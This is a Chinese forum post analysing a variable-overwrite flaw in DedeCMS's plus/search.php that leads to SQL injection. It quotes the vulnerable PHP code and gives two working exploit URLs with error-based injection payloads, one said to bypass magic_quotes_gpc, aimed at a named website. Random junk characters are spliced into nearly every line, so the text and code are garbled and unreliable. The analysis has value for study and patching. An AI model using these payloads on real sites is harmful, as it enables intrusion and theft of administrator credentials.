微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
! o( t9 M7 {3 o$ T: [& l" `; Z作者: c4rp3nt3r@0x50sec.org& n: g' o. b. I5 }, O+ P
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.! c% E u9 m: c0 i' n% M
$ C& H+ i* F. Q( t' F' s5 B. s$ s黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.5 @$ t9 ^, }$ h8 p4 f& }" ?
* L7 H% ?" E; b# E: v============8 o" N- \5 @" F0 z W5 ~2 \
4 w( g( V6 |$ ?% r
& |8 [1 W- K# A# O
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
* N. l8 J+ y. j $ u9 |$ _, w* y, k: n
require_once(dirname(__FILE__).”/../include/common.inc.php”);
, _; E/ u# y- P7 b5 D5 y3 X+ Mrequire_once(DEDEINC.”/arc.searchview.class.php”);# d, ~7 [7 L; W) L+ s# ]; F' V
( `8 F' u$ T* _% H
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;9 W. A g6 a1 `/ U5 F- l
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
! L6 X. e& J8 |5 G$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;, k$ {+ y4 n2 s/ L& E
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
! h' ^+ y% l# X' d1 i$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;! v3 p# Q$ y" n: }/ z( J; M" q
- r/ E5 Z9 x2 ~if(!isset($orderby)) $orderby=”;
$ X9 v5 z' l }$ W" F1 Celse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);* \" H! a9 ^" i5 M! [& f4 D2 C
2 e" Y b7 N* R9 D( l' f- s
3 {* R' S e0 i5 z0 S) W3 T
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
% ]3 Z& f# V0 c- D4 z2 O/ X) ~else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);, ]6 `# k6 N. W& K5 y+ k% F+ H
& g' W9 e" m: D% F, f1 p: j
if(!isset($keyword)){
( y5 J' Q1 a" I% u1 y1 p: j if(!isset($q)) $q = ”;" R: L" l! D% f/ q* `' _9 J- R
$keyword=$q;4 G* q: c: j. o7 g/ R0 X1 f
}; V; j8 g2 i3 H$ Z; F9 ?# y8 a
0 R% H( D2 j3 X5 [+ S
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));" g7 ]! Y1 O2 F: f# `
* c: a$ \( G o( {+ ]. W3 w//查找栏目信息3 K: p% S: V6 f6 m( U6 N0 x1 ~1 @
if(empty($typeid))
8 H. B( Z/ P: s9 `3 Y) W1 F' N{: z3 M4 J" n) A2 D
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;& r) j! j; k8 g: L6 n3 w
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
! I, q; s) I: v; }; j {
7 |' ~% Q4 C( |9 E" ^( \! | $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
: z0 s% S/ h6 K fwrite($fp, “<”.”?php\r\n”);3 _ T b3 p: U2 g$ X4 y g
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
9 }8 z% n0 Q0 u! D! @# c' [ $dsql->Execute();
+ Q5 t3 e% b% G# ~) v while($row = $dsql->GetArray())
" _. x, @/ E, \/ K {
( p5 Y: i& q% T* t3 G+ b2 P7 S fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
; _: q5 y- N2 B$ T7 ~. |% L }
6 X2 x/ j; H; Y) E n. e& z ? fwrite($fp, ‘?’.'>’);) T% F* e( ^/ m6 N. g5 c0 \
fclose($fp);% B# f: L! ?" U3 a7 Z& ^$ w. I
}
& Y6 R, L% q( F& L //引入栏目缓存并看关键字是否有相关栏目内容
' _4 K1 Y0 {/ I4 q+ j' n, D require_once($typenameCacheFile);& T7 h! Y; f7 {4 r% Z- t) X
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个: u( @7 A# z' [
//
4 E9 s0 ]1 i( S+ y. U if(isset($typeArr) && is_array($typeArr))
4 f7 p# `& m% @3 \5 I# d K {* x" A" w {9 E7 ?- |: ^5 ~
foreach($typeArr as $id=>$typename)
$ I$ S$ k/ P" x, B {
, N, S5 e- a9 O! L
0 e- y) `" d, F6 e( _# D8 ]1 \! n <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
1 q2 _$ o) h5 s' j- i/ g if($keyword != $keywordn)
7 l, ~* g& r$ P0 N# u2 Q {
0 S" m! W$ n' z4 K3 z) Q% Y1 Q; g $keyword = $keywordn;
: _! C4 j9 k0 y, R% ^' g' N$ L1 C <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设5 g0 [. t9 k5 Q8 m8 T. H
break;; J# `! |7 p% ? t7 x
}' v5 x3 V! J3 l; P4 e( ?2 h) s
}; u9 z+ r2 l8 s2 z) j
}
: @. o3 P) p/ Z4 i! _( v; x}
D. x( c$ `/ j" C6 X: ~然后plus/search.php文件下面定义了一个 Search类的对象 .
& y6 d% N7 E8 R, z6 O在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
5 P0 l* ~3 T6 c$this->TypeLink = new TypeLink($typeid);
; e Y& h' B' q% v$ l $ k7 o4 z6 }) ^5 O& Q$ D
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
2 y. p' @6 C) Q$ b! L& Y; G7 ?
, ?/ [" G! D y0 K1 u1 vclass TypeLink8 B# k4 j3 C$ ?. ~
{. n. K+ w8 H2 Y& [) b0 A
var $typeDir;
/ r1 x; D4 @+ [ i, m9 E2 q# d) d var $dsql;
$ E; x: t( s/ c, T# P& R+ l& ?+ T var $TypeID;
7 _4 U C# a+ H1 H ^, ?' y T var $baseDir;
0 F" w4 p4 P1 G0 ^9 x' E var $modDir;
! }: Q- ~6 e, |! y j var $indexUrl;" T1 p7 X2 _) G) m) j9 }
var $indexName;
8 n$ d, o; l* q8 I8 [ var $TypeInfos;" ?8 C* k3 u' K# `3 ]0 p0 c' q. }) N7 d5 P$ I
var $SplitSymbol;
. g3 ~4 ?; Z4 n8 I1 O. n var $valuePosition;
. R: I* u* c' a- I1 m, U var $valuePositionName;
! v8 X1 z/ B/ Y t var $OptionArrayList;//构造函数///////7 n6 v. F% V& A2 g+ s, E8 p. y
//php5构造函数
; m w8 y: f' u1 Y# { Q7 W; d function __construct($typeid)9 a/ p+ T1 E+ i k9 A* k
{7 }0 K$ U8 l! p" z) P
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];% f2 N/ t* R a: P1 V. `
$this->indexName = $GLOBALS['cfg_indexname'];5 B; c& F2 M+ l! c' q
$this->baseDir = $GLOBALS['cfg_basedir'];
5 y# |/ L& A7 n5 t: c $this->modDir = $GLOBALS['cfg_templets_dir'];% B& O$ l; i% j7 |3 x; K
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
- |5 ]& B1 W, @- L $this->dsql = $GLOBALS['dsql'];
: v9 ^# c5 r. B* i $this->TypeID = $typeid;! C7 q+ w- Y9 K- d+ }' ]8 h0 z) c
$this->valuePosition = ”;* J, t$ Z0 M" \. W6 Q" j
$this->valuePositionName = ”;* S+ k5 L/ j" B: C: Z
$this->typeDir = ”;; k3 r4 A* ^( m# Q! U) a3 m3 _- ?
$this->OptionArrayList = ”;5 O. X) T& _4 u* B g
$ P: j5 X6 M( s& _3 Q" `
//载入类目信息' B1 M! t3 w% ^6 O' ?
5 W8 i! D3 c/ u+ ?9 \$ n; g
<font color=”Red”>$query = “SELECT tp.*,ch.typename as; U( Q" ?6 b8 L2 B5 K. P* ~: S
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join; ]) Z1 q9 P9 T, x
`#@__channeltype` ch
( o4 B: w8 ^8 N" y5 ^ on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿9 C; S/ E) q6 _" u0 U: h
0 N4 e+ T1 w0 Q' Q if($typeid > 0)
) t; g% T( m( Y# c$ i {
; Q9 U* I# V* f $this->TypeInfos = $this->dsql->GetOne($query);
* r2 k0 X5 [" w$ S! K$ ~; k利用代码一 需要 即使magic_quotes_gpc = Off
* |( R% X! O- C" H2 U3 r
+ ~0 u* M, E7 K: ]" x# `& S9 \% vwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title2 v* Y/ {2 H( e) ^, G' p# K3 @) L
. y8 B/ o3 q+ k3 u: i0 Z y: G; N这只是其中一个利用代码… Search 类的构造函数再往下
7 `) B3 u% y, q' n
8 C/ s: n$ w- I: G……省略& j! h; _$ t$ h z8 ]0 M
$this->TypeID = $typeid;
& j4 v3 f) z7 [* [# [' N3 _……省略/ m, T+ R5 D! u% i3 X g# r' {
if($this->TypeID==”0″){
' f7 F& L# q* s3 S- c. } $this->ChannelTypeid=1;
8 v0 W/ e$ K( ^" @* y1 F l }else{ Y$ x' x4 i0 z. o7 G
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
" [- ]0 t+ ^% \- O% c! [//现在不鸡肋了吧亲…2 f7 u Q- u) |4 J( u
$this->ChannelTypeid=$row['channeltype'];
- ^' U3 W9 W6 A9 E) Z& V % v6 U, n. k& h$ a$ x2 S
}
" s/ L4 [7 y3 ~. N& k利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
- x8 O3 c; c+ P+ V
7 {7 E" |; M, X+ e, U8 Kwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
9 S2 e; X5 T1 U1 j% n& A/ }. B
7 Y$ C1 C0 Y7 E: u0 L G* W如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站/ @1 ?# u( V/ U" k( V
|